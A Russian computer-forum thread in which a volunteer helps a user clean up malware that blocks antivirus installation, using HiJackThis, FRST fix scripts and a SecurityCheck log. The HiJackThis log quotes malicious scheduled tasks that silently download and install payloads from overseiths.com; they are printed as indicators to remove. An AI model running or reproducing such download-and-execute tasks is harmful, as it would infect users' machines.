0 / 0 / 0
Регистрация: 03.04.2019
Сообщений: 12
1

Вирус блокирует установку антивируса и браузер при поиске антивируса

03.04.2019, 20:35. Показов 955. Ответов 11
Метки нет (Все метки)

Также с небольшой периодичностью в браузере открывается сайт с рекламой.
С виду проблема аналогична темам: Вирус блокирует процесс установки антивируса, процесс браузера при попытке скачать антивирус и Вирус не дает установить антивирус. Браузер зависает при любом напоминании об антивирусе
AVZ завис на запуске, запускал программы сбора логов по отдельности.
Вложения
Тип файла: 7z Check_Browsers_LNK.7z (1.8 Кб, 3 просмотров)
Тип файла: 7z HiJackThis.7z (13.3 Кб, 5 просмотров)
__________________
Помощь в написании контрольных, курсовых и дипломных работ здесь
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
03.04.2019, 20:35
Ответы с готовыми решениями:

Браузер виснет при поиске антивируса, установка антивируса невозможна (зависает намертво)
Предыстория: Искал crack для одной программы и нашёл что искал на ютубе. Просмотров было несколько...

Браузер виснет при поиске антивируса, установка антивируса невозможна (зависает намертво)
Предыстория: Искал crack для одной программы и нашёл что искал на ютубе. Просмотров было несколько...

Троян блокирует установку антивируса
Началась моя история с того, что касперский нашел троян. Касперский писал: "Обнаружено:...

Браузер и страницы зависают при поиске антивируса, браузер открывает сам страницы с рекламой
Столкнулся с проблемой в браузере Edge на Windows 10. Кое как скачал утилиты KVRT, он обнаружил...

11
Вирусоборец
3786 / 2023 / 321
Регистрация: 04.04.2012
Сообщений: 7,496
03.04.2019, 21:02 2
Пофиксите эти строки в HJT (C:\Users\Entrosolet\Downloads\AutoLogger-pif\AutoLogger\HiJackThis\HJT.pif):

Код
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: DriverPack Cloud Admin - C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run admin-scheduler (file missing)
O22 - Task: DriverPack Cloud Autoupdate - C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run autoupdate --validate (file missing)
O22 - Task: \Microsoft\Windows\SMB\UninstallSMB1ClientTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Client"
O22 - Task: \Microsoft\Windows\SMB\UninstallSMB1ServerTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Server"
O22 - Task: {5EA89E13-4032-CABC-4CF9-98FAD7333D56} - C:\WINDOWS\PidyI.exe -q -i https://overseiths.com/evzabdlxvvvr.bkt
O22 - Task: {D20438A8-E08C-D77E-B4DF-088069D0FCCF} - C:\WINDOWS\system32\msiexec.exe /package https://overseiths.com/83wo173nulxk.veg -q
Соберите логи FRST: https://www.cyberforum.ru/post7151340.html
1
0 / 0 / 0
Регистрация: 03.04.2019
Сообщений: 12
03.04.2019, 21:31  [ТС] 3
Пофиксил.
При переходе на страницу FRST браузер завис. Выполнил операцию сканирования в безопасном режиме Windows.
Вложения
Тип файла: 7z FRST.7z (39.4 Кб, 2 просмотров)
0
Вирусоборец
3786 / 2023 / 321
Регистрация: 04.04.2012
Сообщений: 7,496
03.04.2019, 21:48 4
Отключите до перезагрузки антивирус.
Выделите следующий код:

Код
Start::
CreateRestorePoint:
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Lsa: [Authentication Packages] msv1_0 SshdPinAuthLsa
CHR HKLM-x32\...\Chrome\Extension: [necfmkplpminfjagblfabggomdpaakan] - hxxp://clients2.google.com/service/update2/crx
2019-04-03 07:37 - 2019-04-03 07:37 - 000000000 ____D C:\Users\Все пользователи\Babylon
2019-04-03 07:37 - 2019-04-03 07:37 - 000000000 ____D C:\Users\Entrosolet\AppData\Roaming\Babylon
2019-04-03 07:37 - 2019-04-03 07:37 - 000000000 ____D C:\Users\Entrosolet\AppData\Local\Babylon
2019-04-03 07:37 - 2019-04-03 07:37 - 000000000 ____D C:\ProgramData\Babylon
AlternateDataStreams: C:\Users\Entrosolet\AppData\Local\Temp:$DATA​ [16]
CMD: "%ProgramFiles%\\Windows Defender\\MpCmdRun.exe" -Scan -ScanType 1
CMD: ipconfig /flushdns
CMD: wmic qfe list
EmptyTemp:
Reboot:
End::
Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
1
0 / 0 / 0
Регистрация: 03.04.2019
Сообщений: 12
03.04.2019, 22:13  [ТС] 5
Выполнил.
Вложения
Тип файла: 7z Fixlog.7z (1.8 Кб, 1 просмотров)
0
Вирусоборец
3786 / 2023 / 321
Регистрация: 04.04.2012
Сообщений: 7,496
03.04.2019, 22:17 6
Изменения есть?
0
0 / 0 / 0
Регистрация: 03.04.2019
Сообщений: 12
03.04.2019, 22:30  [ТС] 7
Да. Первоначальной проблемы больше не наблюдается: браузер работает, антивирус устанавливается.
0
Вирусоборец
3786 / 2023 / 321
Регистрация: 04.04.2012
Сообщений: 7,496
03.04.2019, 22:33 8
Подготовьте лог SecurityCheck by glax24: https://safezone.cc/resources/... 5/download
0
0 / 0 / 0
Регистрация: 03.04.2019
Сообщений: 12
03.04.2019, 22:40  [ТС] 9
SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]
WebSite: www.safezone.cc
DateLog: 03.04.2019 21:36:41
Path starting: C:\Users\Entrosolet\AppData\Local\Temp\SecurityCheck\Securit yCheck.exe
Log directory: C:\SecurityCheck\
IsAdmin: True
User: Entrosolet
VersionXML: 6.18is-31.03.2019
____________________________________________________________ _______________

Windows 10(6.3.17134) (x64) Professional Версия: 1803 Lang: Russian(0419)
Дата установки ОС: 17.05.2018 21:48:45
Статус лицензии: Office 19, Office19Word2019VL_KMS_Client_AE edition Срок истечения многопользовательской активации: 178459 мин.
Статус лицензии: Office 19, Office19Excel2019VL_KMS_Client_AE edition Срок истечения многопользовательской активации: 178459 мин.
Статус лицензии: Windows(R), Professional edition Срок истечения многопользовательской активации: 257624 мин.
Статус лицензии: Office 19, Office19Access2019VL_KMS_Client_AE edition Срок истечения многопользовательской активации: 178459 мин.
Режим загрузки: Normal
Браузер по умолчанию: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Системный диск: C: ФС: [NTFS] Емкость: [97.1 Гб] Занято: [51.9 Гб] Свободно: [45.2 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.648.17134.0
Контроль учётных записей пользователя включен (Уровень 2)
Центр обновления Windows (wuauserv) - Служба работает
Центр обеспечения безопасности (wscsvc) - Служба работает
Удаленный реестр (RemoteRegistry) - Служба остановлена
Обнаружение SSDP (SSDPSRV) - Служба работает
Службы удаленных рабочих столов (TermService) - Служба остановлена
Служба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена
Восстановление системы отключено
---------------------------- [ Antivirus_WMI ] ----------------------------
Windows Defender (включен и обновлен)
--------------------------- [ FirewallWindows ] ---------------------------
Брандмауэр Защитника Windows (mpssvc) - Служба работает
--------------------------- [ AntiSpyware_WMI ] ---------------------------
Windows Defender (включен и обновлен)
--------------------------- [ OtherUtilities ] ----------------------------
7-Zip 18.05 (x64) v.18.05 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
VLC media player v.3.0.4 Внимание! Скачать обновления
7-Zip 18.03 beta v.18.03 beta Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
K-Lite Codec Pack 14.7.5 Basic v.14.7.5 Внимание! Скачать обновления
Steam v.2.10.91.91
TeamViewer 14 v.14.2.2558
TeamViewer 14 (TeamViewer) - Служба работает
--------------------------------- [ IM ] ----------------------------------
Discord v.0.0.305
Telegram Desktop version 1.5.11 v.1.5.11 Внимание! Скачать обновления
^Необязательное обновление.^
---------------------------- [ ProxyAndVPNs ] -----------------------------
Kaspersky Secure Connection v.19.0.0.1088
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.5.45146 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
--------------------------- [ AdobeProduction ] ---------------------------
Adobe AIR v.32.0.0.89
Adobe Flash Player 32 PPAPI v.32.0.0.156
------------------------------- [ Browser ] -------------------------------
Opera Stable 58.0.3135.127 v.58.0.3135.127
Google Chrome v.73.0.3683.86
------------------ [ AntivirusFirewallProcessServices ] -------------------
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 3.0\ksde.exe v.19.0.0.1088
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 3.0\ksdeui.exe v.19.0.0.1088
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1902.2-0\MsMpEng.exe v.4.18.1902.2
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1902.2-0\NisSrv.exe v.4.18.1902.2
C:\Program Files\Windows Defender\MSASCuiL.exe v.4.13.17134.1
Антивирусная программа "Защитника Windows" (WinDefend) - Служба работает
Служба проверки сети Windows Defender Antivirus (WdNisSvc) - Служба работает
---------------------------- [ UnwantedApps ] -----------------------------
Auslogics BoostSpeed 10 v.10.0.23.0 Внимание! Подозрение на демо-версию антишпионской программы, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
----------------------------- [ End of Log ] ------------------------------
0
Вирусоборец
3786 / 2023 / 321
Регистрация: 04.04.2012
Сообщений: 7,496
03.04.2019, 22:42 10
Обновляйте программы и читайте: Рекомендации после удаления вредоносного ПО
1
0 / 0 / 0
Регистрация: 03.04.2019
Сообщений: 12
03.04.2019, 22:44  [ТС] 11
Благодарю!
0
Вирусоборец
3786 / 2023 / 321
Регистрация: 04.04.2012
Сообщений: 7,496
03.04.2019, 22:50 12
Удачи)

Если есть вот этот файлик:

C:\WINDOWS\PidyI.exe
Проверьте его на virustotal.com , а потом в корзину - скорее всего майнер и причина ваших несчастий
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
03.04.2019, 22:50

Вирус закрывает установку антивируса
Вирус закрывает установку антивируса. Вот логи: . Помогите пожалуйста избавится от заразы. Заранее...

Вирус блокирует процесс установки антивируса, процесс браузера при попытке скачать антивирус
При попытке загуглить любой известный антивирус или перейти на его сайт напрямую процесс браузера...

Вирус блокирует запуск практически всех программ, в том числе антивируса
добрый вечер! Недавно столкнулся с необычным вирусом. Хотел скачать тренер для игры и наткнулся на...

При скачивании антивируса поймала вирус.ПОМОГИТЕ!
Здравствуйте........Стоял у меня dr.Web,на котором закончилась лицензия......Я его удалила и решила...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
12
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2021, vBulletin Solutions, Inc.